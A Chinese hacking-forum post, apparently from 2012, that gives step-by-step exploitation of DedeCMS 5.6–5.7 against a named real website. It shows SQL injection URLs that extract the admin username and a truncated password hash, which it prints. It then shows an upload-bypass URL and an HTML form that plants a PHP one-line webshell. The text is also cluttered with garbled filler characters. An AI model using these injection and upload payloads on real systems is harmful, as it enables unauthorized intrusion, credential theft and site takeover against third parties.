中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]
作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
/ A$ s5 k9 M' ^3 j3 @$ |* y这站 http://www.political-security.com/
3 j8 t" N, o, k* b% \% \' N首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,* s- s) F* t+ J; M7 U/ c0 S9 d) O
www.political-security.com/data/mysql_error_trace.inc 爆后台0 s% y& Z% x: [. v# Q2 n
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。1 @! G  \$ @4 b- o: l
然后写上语句
9 \; Z6 z. y- d) X查看管理员帐号$ z. T2 c; Y- ]" U
http://www.political-security.co ... &membergroup=@`1 m; t( k) a+ g9 h

" l* m7 b7 z' Z/ @$ H5 b9 yadmin
! C9 {. b0 Y: n- s7 k) J4 a9 N0 Y' c1 Q7 t& ?
查看管理员密码+ U7 e; `, U2 t) a
 http://www.political-security.co ... &membergroup=@`  W3 ^( r  S# t( m# q4 I) J

  k; r0 @! x. ]1 j9 M5 q8d29b1ef9f8c5a5af429
5 Z& W; x: V7 C) ]. F1 I
% f, L6 T! `  ~; b( h0 Y# v9 x查看管理员密码
+ L% A. ?/ W* _9 p) v5 f: `" n, c% e5 _1 u5 _) p! q
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5" }6 `, I7 }" k4 b
. b6 T4 [& b1 o0 Y7 R
8d25 J" r/ t6 }  l( g
9b1ef9f8c5a5af42
( _7 ^: }7 a. M  c- z. {9
3 E& C! Y$ j# k6 t; m" N. q  m9 b
2 F* P* O; k( x5 ^0 ^9 Ncmd5没解出来 只好测试第二个方法- X- o$ Y& d7 u8 q' f' l; [

0 C! f6 A. ?+ X  [1 e) L
) u* Z, E' @! u②上传漏洞:
' m2 @2 W! t' t, D4 U5 {2 F# I
/ k" d- |  Y- [! ^. F% f1 H只要登陆会员中心,然后访问页面链接6 I: Y8 M0 }) K1 I6 a# f
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”: D+ c! K" c3 [. c
. R9 }" N% G$ J9 x: ^+ |5 F* P
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”. W8 h* ~( K7 f" G4 e
; Y0 p- K; X) y7 M+ W8 z& k8 A! o
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm( m- J5 r8 f% G3 Y/ b' b4 R
4 n3 q: S# V+ p& d7 a/ h) @
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>1 f* C4 [) }: [2 E+ M
或者
8 L: E& r4 G7 L$ g. F  a即可上传成功



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2